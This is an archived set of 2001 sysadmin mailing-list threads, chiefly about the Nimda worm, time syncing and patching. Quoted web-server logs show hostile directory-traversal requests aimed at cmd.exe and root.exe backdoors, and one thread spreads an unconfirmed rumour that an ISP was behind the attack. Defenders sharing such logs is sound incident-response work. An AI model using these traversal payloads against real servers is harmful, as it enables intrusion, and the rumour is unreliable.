Hey Rocky? Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Tom Carbone [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 9:45 AM To: NT System Admin Issues Subject: Server Monitoring Software Omnitrend has begun shipping its new server monitoring product, ServScan. Thanks go to all on this list who participated in the beta. For details on this product, see http://www.omnitrend.com/ServScan/ServScan.html We've had so many positive comments and suggestions from members of this list. As such, we are offering a 15% discount on ServScan to all list members who purchase the product before October 31, 2001. Just mention ntsysadmin when placing an order. Thanks again, everyone! http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: net time
If you don't want to use W2K's utility - there are several freeware utilities that will synch with Atomic clocks - D4 is an easy one. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Miley, Dan [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 11:01 AM To: NT System Admin Issues Subject: RE: net time aren't there some timers to indicate how often to resynch the time. Does anyone know where these are. I know 2k does a lot more activity to make sure the time is set. That can mean more overhead on WAN links. Shouldn't you use the name instead of the IP, in case you decide to move the pdc? Dan It is not the critic who counts; not the man who points out where the strong man stumbled or where the doer of deeds could have done them better. The credit belongs to the man who is actually in the arena, whose face is marred with dust and sweat and blood. At best, he knows the triumph of high achievement; if he fails, at least he fails while daring greatly, so that his place shall never be with those cold and timid souls who knew neither victory nor defeat. Theodore Roosevelt -Original Message- From: Russ Braaten [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 10:05 AM To: NT System Admin Issues Subject: RE: net time Actually, while working on this very topic today, I found out some interesting issues. My production domain is still NT4. I have my PDC and BDCs running timeserve and retrieving their time from a corporate timeserver across our WAN (they have the actual internet connection). and my users, win95, 98, and a few win2k, run a login script that does a net time \\xxx.xx.xxx.xxx /set using the ip address of our PDC. While testing a WIN2k server and workstation on a test domain, I noticed that the workstation was syncing from the DC in my test domain, but the time was way off from my production machine, so I started looking for how to sync the time from the corporate time server across the WAN. This turned out to be a fairly simple process, once I found the instructions. Run from a command line c:\net time /setsntp:xxx.xx.xxx. then cycle your windows time service. It actually writes to the registry where to look for time syncing. This worked from both the server and pro box. I pointed them both to the corp box, but could have left the pro box syncing to the DC and the DC syncing to the corp box, to minimize WAN traffic, which is probably best practice, once rolled out. Just thought someone out there might want to know, Russ Braaten, MCSE, MCP+I Actually, that is what I have always done. One of my associates pointed out the effect of just using net time /set and I couldn't answer why we got the different results. Just goes to show that browsing and NetBIOS is far from gone in W2K. *** Pete Carstensen, MCSE Senior LAN Engineer CSK Auto, Inc. 645 E. Missouri Ave. Phoenix, AZ 85012 (602) 631-7176 [EMAIL PROTECTED] Little surprises around every corner, but nothing dangerous. -- Willie Wonka -Original Message- From: Phil Pettifer [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 1:05 PM To: NT System Admin Issues Subject: RE: net time The simple answer is to hard code the name of the machine you want to use for network time into the script you are calling the command from... e.g. net time \\mypdc.mydomain.com /set -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 3:19 PM To: NT System Admin Issues Subject: Re: net time it seems like the net time command does not care about ntp service at all but queries the first alphabetical computer on a local subnet. Does your proxy's NetBIOS name comes before your PDC name? Andrey Kalinin Please respond to NT System Admin Issues [EMAIL PROTECTED] To: NT System Admin Issues [EMAIL PROTECTED] cc: (bcc: Andrey Kalinin/FIS) Subject: net time I have an interesting situation. Environment: NT4 Domain, W2K Pro workstation. PDC (NT4, SP6) set to be the time server via NET TIME /SETSNTP:PDC at the workstation (verified via /querysntp) The PDC is running Windows Time Service (w32time) and is set as an NTP server. It gets its time from a proxy server (W2KS) which has it's time updated from NIST. Anyway, at the W2KP station, if you type net time /set it points to the proxy server. Why? If you enter net time /domain /set it points to the PDC as well as when you do the /querysntp. All I can think of is that the net time /set command sees the ntp service on the proxy server and reports connection to it. Why is it not going to the PDC like it is told to do? Pete *** Pete Carstensen, MCSE Senior LAN Engineer CSK Auto, Inc. 645 E.
RE: Help for the Nimda virus
Mod the shortcut to point to the windows dir and it works fine. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Jim Busick [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 12:26 PM To: NT System Admin Issues Subject: RE: Help for the Nimda virus We appreciate the thought, but the tool does not install properly. -Original Message- From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 8:14 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus -Original Message- From: Kevin Lundy [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 10:54 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus It also doesn't work. I downloaded and installed it, and it didn't even create an executable. That's not true actually. 1. It is FREE a production copy. The link is right on the home page to the right of the dancing tools. 2. The search.exe file is in the c:\winnt\system32 directory. I didn't think it would be difficult to give something away. :0 John -Original Message- From: Givens, Mike [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 10:51 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus define free the link provided only goes to a trail version located in the downloads area ? -Original Message- From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 9:50 AM To: NT System Admin Issues Subject: Help for the Nimda virus Previous email contained an incorrectly formatted URL. Try this one. If any one is interested: We are giving away FREE our SearchIt program. SearchIt can search your logfiles, or any files, for text strings you define. You can search for cmd.exe or tftp or any other piece of a virus or IIS exploit. SearchIt may be run via a scheduler and a report of the found files is emailed to you. The FREE Download is at: http://www.serverautomationtools.com John Cesta http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Help for the Nimda virus
Agree that it's poor programming but - it's free. Maybe they will fix based on input. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Jim Busick [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 12:36 PM To: NT System Admin Issues Subject: RE: Help for the Nimda virus I find it ironic that I had to use Explorer Search to find Searchit. -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 9:29 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus Mod the shortcut to point to the windows dir and it works fine. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Jim Busick [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 12:26 PM To: NT System Admin Issues Subject: RE: Help for the Nimda virus We appreciate the thought, but the tool does not install properly. -Original Message- From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 8:14 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus -Original Message- From: Kevin Lundy [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 10:54 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus It also doesn't work. I downloaded and installed it, and it didn't even create an executable. That's not true actually. 1. It is FREE a production copy. The link is right on the home page to the right of the dancing tools. 2. The search.exe file is in the c:\winnt\system32 directory. I didn't think it would be difficult to give something away. :0 John -Original Message- From: Givens, Mike [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 10:51 AM To: NT System Admin Issues Subject: RE: Help for the Nimda virus define free the link provided only goes to a trail version located in the downloads area ? -Original Message- From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 9:50 AM To: NT System Admin Issues Subject: Help for the Nimda virus Previous email contained an incorrectly formatted URL. Try this one. If any one is interested: We are giving away FREE our SearchIt program. SearchIt can search your logfiles, or any files, for text strings you define. You can search for cmd.exe or tftp or any other piece of a virus or IIS exploit. SearchIt may be run via a scheduler and a report of the found files is emailed to you. The FREE Download is at: http://www.serverautomationtools.com John Cesta http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Win2KPro Security updates
St Bernard Software - Update Expert. Email directly if you want more info. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Stefan Jafs [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 4:06 PM To: NT System Admin Issues Subject: Win2KPro Security updates I have 40 Win2kPro workstations. How do I update all my systems without having to update single systems with windows update? Stefan http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: NIMDA virus Help please
Valencia, What is your anti-virus program? Have you updated it to the latest? Have you followed the guidelines set down by SARC or others to remove EML or NWS files? If your server is infected, STOP all the services or you will not eradicate it. Also, check out the removal tool from http://www.centralcommand.com. Email back if you have questions. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Dawson, Valencia [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 4:13 PM To: NT System Admin Issues Subject: NIMDA virus Help please I will attempt to post another SOS and hope this is delivered this time. After several attempts to get rid of this virus I am still not able to see the back of it. I installed the patches, did various virus scans and still I keep getting the files with the html,nws and enc files being infected. This is happening on the exchange server. The intranet server seems to be clear of viruses but whereas users can access the internet, they cannot access the intranet. The WWW and FTP services have stopped and I cannot restart them. Help please if you get this message. Thank you in advance. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: NIMDA virus Help please
Ouch. Nothing like virus terrorism. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 4:35 PM To: NT System Admin Issues Subject: RE: NIMDA virus Help please As others have stated, once you are infected, it's Game over. Wipe the machine. You should not try to disinfect the machine. From http://www.cert.org/body/advisories/CA200126_FA200126.html: The only safe way to recover from the system compromise is to format the system drive(s) and reinstall the system software from trusted media (such as vendor-supplied CD-ROM). -Original Message- From: Kevin Lundy [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 3:28 PM To: NT System Admin Issues Subject: RE: NIMDA virus Help please Fdisk -Original Message- From: Dawson, Valencia [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 4:29 PM To: NT System Admin Issues Subject: RE: NIMDA virus Help please Then what will. I have the recent virus definition files which they said would. -Original Message- From: Peter Pearson [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 4:18 PM To: NT System Admin Issues Subject: Re: NIMDA virus Help please After you have been infected applying the patches and doing a virus scan will not rid your system(s) of the virus. http://microsoft.com/technet/treeview/default.asp?url=/technet/security/topi cs/Nimda.asp - Original Message - From: Dawson, Valencia [EMAIL PROTECTED] To: NT System Admin Issues [EMAIL PROTECTED] Sent: Wednesday, September 19, 2001 4:13 PM Subject: NIMDA virus Help please I will attempt to post another SOS and hope this is delivered this time. After several attempts to get rid of this virus I am still not able to see the back of it. I installed the patches, did various virus scans and still I keep getting the files with the html,nws and enc files being infected. This is happening on the exchange server. The intranet server seems to be clear of viruses but whereas users can access the internet, they cannot access the intranet. The WWW and FTP services have stopped and I cannot restart them. Help please if you get this message. Thank you in advance. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: WARNING: Hacker Alert
In a follow up from this message, I contacted some senior people at Wcom/ UUNet this afternoon and asked about the validity of the attack from Wcom - this was the first they had heard that. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Dean Cunningham [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 4:48 PM To: NT System Admin Issues Subject: RE: WARNING: Hacker Alert It targets the class A that your server is on and heavily targets the class b your server is on. If you are in a class a or b and that class is owned by the ISP, then more than likely the other IPs are used by dumb/uninformed home users cheers Dean -Original Message- From: Robert E Young - NetX [mailto:[EMAIL PROTECTED]] Sent: Thursday, 20 September 2001 6:31 a.m. To: NT System Admin Issues Subject: Re: WARNING: Hacker Alert Anything with 63 octet has the problem, I have heard it is due to a MCI Worldcom attack. I see you have the 63 octet. Robert E, Young MCSE C/S Systems Engineer Dallas, TX USA - Original Message - From: xylog [EMAIL PROTECTED] To: NT System Admin Issues [EMAIL PROTECTED] Sent: Tuesday, September 18, 2001 09:45 AM Subject: WARNING: Hacker Alert All my public facing web servers at home and at my office have shown a huge continuous hacking activity. Has anyone seen similar? I fear this may be code red related or automated. Please comment if you have seen similar. Here is an excerpt from one logfile: 63.101.9.107, -, 9/18/01, 10:36:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..Á ../..Á ../..Á ../winnt/system32/cmd.exe , /c+dir, 63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/..Á ../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:33, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir, 64.156.252.27, -, 9/18/01, 10:36:42, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 15, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:06, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..Á ../..Á ../..Á ../winnt/system32/cmd.exe , /c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97, 604, 404, 3, GET, /scripts/..Á ../winnt/system32/cmd.exe, /c+dir, 64.156.252.27, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -, 63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01,
RE: How to remove Nimda from NT Server without a reload
I heard from another list the Trend Micro has a new tool that removes and corrects. CERT indicates there is no receovery. Which way to go? Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Matthew Western [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 9:59 PM To: NT System Admin Issues Subject: How to remove Nimda from NT Server without a reload Any links on how to remove Nimda from NT without a reload? when i run the removal tool from this list it crashes... any idea what services it overwrites and runs as? i've heard cmd.exe and mmc.exe. we've got mmc.exe running but when i try to kill it with task manager it says access denied... ideas? Matthew http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Win2K looping upon bootup
Title: Message Have made the same mistake I found that starting in safe mode, remove reboot reinstall 9 and update to 9.2 resolves it. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Jim Holmgren [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 9:18 AM To: NT System Admin Issues Subject: RE: Win2K looping upon bootup I can vouch for that, I've seen it as well...several times. We use TS on the servers, but we still need Remote Control on some of the 2K Pro workstations. You MUST update from v9.0 to 9.2before rebooting. LiveUpdate will do this for you. If this is what happened, we've fixed it on workstations (IDE) by removing the HDD, setting it up as a slave on a known-good machine and copying somefiles to it from a working version. You can PM me if you happen to need more details. Jim Jim Holmgren MCSE, CCNA [EMAIL PROTECTED] Network Engineer Advertising.com Anytime, anywhere, any Internet channel-- we touch tens of millions online each day. Advertising.com-- Superior Technology, Superior Performance. -Original Message- From: Terry Manolakos [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 9:14 AM To: NT System Admin Issues Subject: RE: Win2K looping upon bootup I think what was meant was to install 9.0 first, but before rebooting, install 9.2, then reboot; otherwise, it crashes after 9.0 and its reboot -Original Message- From: Greg Page [mailto:[EMAIL PROTECTED]] Sent: Monday, September 17, 2001 8:48 PM To: NT System Admin Issues Subject: RE: Win2K looping upon bootup You're supposed to update to 9.21 before you go to 9.0? What's wrong with this picture? Greg -Original Message- From: Daniel Burns [mailto:[EMAIL PROTECTED]] Sent: Monday, September 17, 2001 6:24 PM To: NT System Admin Issues Subject: Re: Win2K looping upon bootup Has anything been added to the computer: software, hardware, etc?? I've seen this with putting pcAnywhere 9.0 on a Win2K system without first updating it to 9.21 before reboot. Daniel - Original Message - From: Konrad Kliewer To: NT System Admin Issues Sent: Friday, September 14, 2001 3:53 PM Subject: RE: Win2K looping upon bootup I have seen this problem with computers with marginal power supplies. You might want to check and see if your power supply is going bad. The machine was rebuilt from scratch; no GHOST. It was working fine for several months up until a day or so ago. -Original Message- From: Heavner, Charlie [mailto:[EMAIL PROTECTED]] Sent: Friday, September 14, 2001 4:16 PM To: NT System Admin Issues Subject: RE: Win2K looping upon bootup are you trying to build the machine from ghost image? If so, your may controller card issues or the image could have been built on a hard drive that is bigger than the destination drive. those 2 issues caused boot-loops for me when I first started working with ghost. -Original Message- From: Terry Manolakos [mailto:[EMAIL PROTECTED]] Sent: Friday, September 14, 2001 4:16 PM To: NT System Admin Issues Subject: Win2K looping upon bootup Firstly, my heart goes out to all those families who lost loved ones in that tragic attack. This e-mail list helped me deal with the emotional torment that I felt from the very first day of the attack. Reading through 350+ e-mails relating to the attack made me feel very close to the pain/frustration of the citizens of the United States as well as others throughout the rest of the world. I have an issue that may be trivial to some but I'll ask anyway. Win2K machine on a Dell Precision 410 (Pentium II with 128Mb RAM (ecc) Diamond Pro FireGl video card) does not get past the starting Windows 2000 (screen with the horizontal bar graph loading)...it just reboots again over and over, looping. Memory, HDD, CPU or video card failure may be the culprit(s) but the system is in a remote location and these can not be ruled out so easily. Booting up in Safe mode results in same problem. Any ideas as to how to isolate the problem remotely? Thanks in advance! Ted M eNGENU!TY Technologies Montreal, Canada Visit us at: http://www.engenuitytech.com http://www.virtualprototypes.ca http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm Konrad Kliewer Staff Engineer Jonathan Amy Facility for Chemical Instrumentation Dept. of Chemistry Purdue University West Lafayette, IN 47907-1393 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
Virus Update
Got this from Peter Kruse who pointed me to http://www.norman.no/ - thanks! The worm W32/Nimda.A@mm is spreading very fast. It may arrive as an email with the following charteristics: Subject: None Body: None Attachment name: README.EXE This worm may enter a computer in several ways - it will either be received as an email with an attachment, over open shared drives in networks, and it seems that it will also attempt to break into machines running the web server software IIS (Internet Information Server), utilizing various security holes well known . All IIS web server admins are encouraged to patch up their web server to protect themselves. An accumulative patch for IIS servers is available from: http://www.microsoft.com/technet/security/bulletin/MS01-044.asp When the infected file is run, it will copy itself to the system directory as a hidden file called LOAD.EXE. This file is called from the file SYSTEM.INI so that it is run from startup. It may not remove everything but it may stop it long enough to see what damage was done. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: serious network down...readme.eml??
Title: serious network down...readme.eml?? Got this from Peter Kruse who pointed me to http://www.norman.no/ - thanks! The worm W32/Nimda.A@mm is spreading very fast. It may arrive as an email with the following charteristics: Subject: None Body: None Attachment name: README.EXE This worm may enter a computer in several ways - it will either be received as an email with an attachment, over open shared drives in networks, and it seems that it will also attempt to break into machines running the web server software IIS (Internet Information Server), utilizing various security holes well known . All IIS web server admins are encouraged to patch up their web server to protect themselves. An accumulative patch for IIS servers is available from: http://www.microsoft.com/technet/security/bulletin/MS01-044.asp When the infected file is run, it will copy itself to the system directory as a hidden file called LOAD.EXE. This file is called from the file SYSTEM.INI so that it is run from startup. It may not remove everything but it may stop it long enough to see what damage was done. Steve Clark Clark Systems Support, LLC www.clarksupport.com -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 1:24 PM To: NT System Admin Issues Subject: RE: serious network down...readme.eml?? Stupid Ev Question #327: eml files can be executed? Thanks, Evan -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 1:05 PM To: NT System Admin Issues Subject: RE: serious network down...readme.eml?? 1 Unplug servers form network. 2 use ERD to recover. 3 send users home. 4 clean clients. -Original Message- From: Terry Manolakos [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:21 PM To: NT System Admin Issues Subject: serious network down...readme.eml?? My network is slammed with some uknown virus of some sort.Both my NT 4.0 servers running MS-Exchange 6.5 have about 2300 alien files which were deleteda readme.eml is being executed by all users somehow automtically and its infecting all my NT domain. I can not Ctrl+Alt+Delete to log into any of the servers.the display shows initialization of the dynamic link library C:\WINNT\system32\USER32.dll failed. The process is terminating abnormally OKaying this results in no effectsall servers have this displayed onscreen. For the ones that have admin already logged in, Services (control panel, settings) can not be accessed! access to the specified device, path, or file is deniedit seems this virus has locked onto this element. PDC is running Exchange (I know, never put'em together...but we're still cleaning up after previous SysAdmins here), and this has gone bezerk as well, with the same message onscreen. Norton/Symantec doesn't recognize readme.emlwho out there can shine a flashlite in this dark mess? thanks in advance. Terry http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
Virus Update
Got this from Peter Kruse who pointed me to http://www.norman.no/ - thanks! The worm W32/Nimda.A@mm is spreading very fast. It may arrive as an email with the following charteristics: Subject: None Body: None Attachment name: README.EXE This worm may enter a computer in several ways - it will either be received as an email with an attachment, over open shared drives in networks, and it seems that it will also attempt to break into machines running the web server software IIS (Internet Information Server), utilizing various security holes well known . All IIS web server admins are encouraged to patch up their web server to protect themselves. An accumulative patch for IIS servers is available from: http://www.microsoft.com/technet/security/bulletin/MS01-044.asp When the infected file is run, it will copy itself to the system directory as a hidden file called LOAD.EXE. This file is called from the file SYSTEM.INI so that it is run from startup. It may not remove everything but it may stop it long enough to see what damage was done. Steve Clark Clark Systems Support, LLC www.clarksupport.com http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: WARNING: Hacker Alert
McAfee posted an updated DAT and removal tool. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 2:17 PM To: NT System Admin Issues Subject: RE: WARNING: Hacker Alert No pattern update or cleaner tool available yet from Symantec. Probably soon. Mark Kelsay mkelsay@SwitchTo: NT System Admin Issues board.com [EMAIL PROTECTED] cc: 09/18/2001 Subject: RE: WARNING: Hacker Alert 11:02 AM Please respond to NT System Admin Issues Anyone posting fixes for this once you are infected? I have looked but have yet to find any. I am running Norton Corporate Edition 7.5. Mark -Original Message- From: xylog [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 10:45 AM To: NT System Admin Issues Subject: WARNING: Hacker Alert All my public facing web servers at home and at my office have shown a huge continuous hacking activity. Has anyone seen similar? I fear this may be code red related or automated. Please comment if you have seen similar. Here is an excerpt from one logfile: 63.101.9.107, -, 9/18/01, 10:36:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..Á ../..Á ../..Á ../winnt/system32/cmd.exe , /c+dir, 63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/..Á ../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 